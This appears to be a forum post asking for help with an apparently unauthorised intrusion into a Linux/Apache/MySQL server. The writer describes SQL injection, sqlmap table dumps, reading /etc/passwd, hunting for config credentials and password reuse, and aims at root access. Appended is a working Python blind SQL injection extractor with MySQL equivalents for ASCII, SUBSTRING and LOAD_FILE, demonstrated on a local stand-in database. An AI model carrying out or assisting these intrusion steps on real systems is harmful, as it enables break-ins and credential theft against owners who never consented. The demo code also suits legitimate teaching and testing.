Hi guys,
I'm currently trying to exploit some system.
It has a web server (Apache) and runs on Linux. It also has some more daemons: MySQL, an FTP server, and the usual SSH server as well.
I didn't run a full nmap yet, only a few main ports scanned.
I've noticed a SQL injection issue in pretty much all website pages.
Which means I can now easily log in to the user webpages.
But I'd like to go further, obviously. I want to see if I can end up completely r00ting the shit out of it.
So I learned about sqlmap.
After struggling a bit with it (the website was not responding properly if the proper headers were not in the HTTP request, etc.), I managed to run it fine.
Now I can also dump (character by character) any table and column in the SQL DB.
That's a good start.
I can get the MySQL users and hashes, but all the hostnames are localhost, so that doesn't really help me get inside more (no direct access to the DB).
Also, the DB doesn't support stacked queries, so I can't get a sql-shell or os-shell and can't upload a backdoor.
Does anyone know some way to bypass this without stacked queries?
I know I can use SQL injection to retrieve files from the system (if I have enough time, because it's damn long). I started to retrieve /etc/passwd to check if I could.
Not sure which files could be interesting to get. I know it would be awesome to get /etc/shadow, but it's not readable by the SQL user...
I will definitely read some .php files from the website to gather intel on the site structure, and maybe also get the connect ID/pass in the clear; that would spare me some time cracking it.
Also, the password might be the same for other services.
Any idea of other config files that would be good to get?
I'll also go on dumping tables that could be of interest.
But then... not sure how to go on.
Any comments, clues, help, ideas would be much appreciated.
Thanks!
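An added illustration, not part of the original post or of sqlmap: the character-by-character dump and the single-statement limit described above, reproduced against a constructed SQLite stand-in. The schema, the two rows and the `username` lookup are invented for the demo; the real target is MySQL, where SQLite's `unicode()`/`substr()` correspond to `ASCII()`/`SUBSTRING()`, and file reads go through `LOAD_FILE()`, which needs the FILE privilege and is restricted by `secure_file_priv`. It shows why a boolean yes/no oracle alone is enough to pull any cell (about 7 requests per character), and why an appended second statement simply makes the page fail instead of running.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the target: one table, two users (not the real site's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users (username, password) VALUES ('admin', 'S3cret!');
        INSERT INTO users (username, password) VALUES ('bob', 'hunter2');
    """)
    return conn


def vulnerable_lookup(conn, user_input):
    """Simulates the injectable page: the parameter is concatenated straight into
    the SQL, and the driver (like PHP's mysql_query) executes one statement only.
    Returns True if at least one row matched, False otherwise or on SQL error."""
    query = f"SELECT id FROM users WHERE username = '{user_input}'"
    try:
        return conn.execute(query).fetchone() is not None
    except (sqlite3.Warning, sqlite3.Error):
        # sqlite3 refuses multi-statement strings (Warning before Python 3.12,
        # ProgrammingError from 3.12); either way the page just "fails".
        return False


def stacked_query_rejected(conn):
    """No stacked queries means the appended DROP never runs: the table is untouched."""
    vulnerable_lookup(conn, "x'; DROP TABLE users; -- ")
    return conn.execute("SELECT count(*) FROM users").fetchone()[0] == 2


class BlindOracle:
    """Turns the True/False behaviour of the page into a yes/no question about
    any SQL expression, one request per question."""

    def __init__(self, conn):
        self.conn = conn
        self.queries = 0  # how many requests the extraction cost

    def ask(self, condition):
        self.queries += 1
        # Break out of the string literal, OR in the condition, comment out the rest.
        return vulnerable_lookup(self.conn, f"' OR ({condition}) -- ")

    def int_value(self, expr, lo, hi):
        """Binary-search the integer value of `expr`, assumed to lie in [lo, hi]."""
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(f"({expr}) <= {mid}"):
                hi = mid
            else:
                lo = mid + 1
        return lo

    def extract(self, column, table, where, max_len=255):
        """Recover one string cell character by character.
        SQLite's unicode()/substr() stand in for MySQL's ASCII()/SUBSTRING()."""
        target = f"(SELECT {column} FROM {table} WHERE {where})"
        length = self.int_value(f"length({target})", 0, max_len)
        chars = []
        for i in range(1, length + 1):
            # Printable ASCII only (32..126); widen the range for other charsets.
            code = self.int_value(f"unicode(substr({target}, {i}, 1))", 32, 126)
            chars.append(chr(code))
        return "".join(chars)


if __name__ == "__main__":
    db = build_db()
    print("stacked query rejected:", stacked_query_rejected(db))
    oracle = BlindOracle(db)
    secret = oracle.extract("password", "users", "username = 'admin'")
    print(f"recovered {secret!r} in {oracle.queries} requests")
```

Run it directly to see the request count. The same `int_value` search works for `length(...)`, `ASCII(...)` or any other integer the injection can compare, which is why blind techniques are slow (one round trip per bit) but need neither stacked queries nor a visible result column.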